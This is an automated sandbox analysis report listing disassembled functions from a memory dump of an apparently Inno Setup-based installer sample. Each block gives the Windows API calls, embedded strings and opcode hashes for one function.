                                                            • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                            • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                            • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                            • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                            APIs
                                                            • GetCursorPos.USER32 ref: 00417270
                                                            • SetCursor.USER32(00000000), ref: 004172B3
                                                            • GetLastActivePopup.USER32(?), ref: 004172DD
                                                            • GetForegroundWindow.USER32(?), ref: 004172E4
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                            • String ID:
                                                            • API String ID: 1959210111-0
                                                            • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                            • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                            • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                            • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                            APIs
                                                            • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                            • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                            • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                            • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                            • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                            • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                            • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                            APIs
                                                            • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                            • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                            • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                            • String ID:
                                                            • API String ID: 4025006896-0
                                                            • Opcode ID: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                            • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                            • Opcode Fuzzy Hash: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                            • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                            APIs
                                                            • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                            • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                            • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                            • String ID:
                                                            • API String ID: 4071923889-0
                                                            • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                            • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                            • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                            • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                            APIs
                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLockSizeof
                                                            • String ID:
                                                            • API String ID: 3473537107-0
                                                            • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                            • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                            • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                            • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,Ub,?,?,?,004018B4), ref: 00401566
                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,Ub,?,?,?,004018B4), ref: 0040158B
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,Ub,?,?,?,004018B4), ref: 004015B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Alloc$Free
                                                            • String ID: Ub
                                                            • API String ID: 3668210933-2151759353
                                                            • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                            • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                            • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                            • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                            Strings
                                                            • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                            • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                            • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                            • API String ID: 1452528299-1392080489
                                                            • Opcode ID: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                            • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                            • Opcode Fuzzy Hash: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                            • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                            Strings
                                                            • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                            • Setting NTFS compression on file: %s, xrefs: 00470867
                                                            • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                            • API String ID: 1452528299-3038984924
                                                            • Opcode ID: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                            • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                            • Opcode Fuzzy Hash: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                            • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                            • String ID:
                                                            • API String ID: 4283692357-0
                                                            • Opcode ID: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                            • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                            • Opcode Fuzzy Hash: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                            • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CountSleepTick
                                                            • String ID:
                                                            • API String ID: 2227064392-0
                                                            • Opcode ID: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                            • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                            • Opcode Fuzzy Hash: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                            • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                            • String ID:
                                                            • API String ID: 215268677-0
                                                            • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                            • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                            • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                            • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                            APIs
                                                            • GetLastActivePopup.USER32(?), ref: 0042425C
                                                            • IsWindowVisible.USER32(?), ref: 0042426D
                                                            • IsWindowEnabled.USER32(?), ref: 00424277
                                                            • SetForegroundWindow.USER32(?), ref: 00424281
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                            • String ID:
                                                            • API String ID: 2280970139-0
                                                            • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                            • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                            • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                            • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                            APIs
                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                            • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocHandleLockUnlock
                                                            • String ID:
                                                            • API String ID: 2167344118-0
                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                            Strings
                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                            • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                            • API String ID: 3535843008-1938159461
                                                            • Opcode ID: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                            • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                            • Opcode Fuzzy Hash: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                            • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                            • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                            Strings
                                                            • Will not restart Windows automatically., xrefs: 00483176
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Window$ActiveForeground
                                                            • String ID: Will not restart Windows automatically.
                                                            • API String ID: 307657957-4169339592
                                                            • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                            • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                            • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                            • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                            Strings
                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                            • API String ID: 0-1974262853
                                                            • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                            • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                            • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                            • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
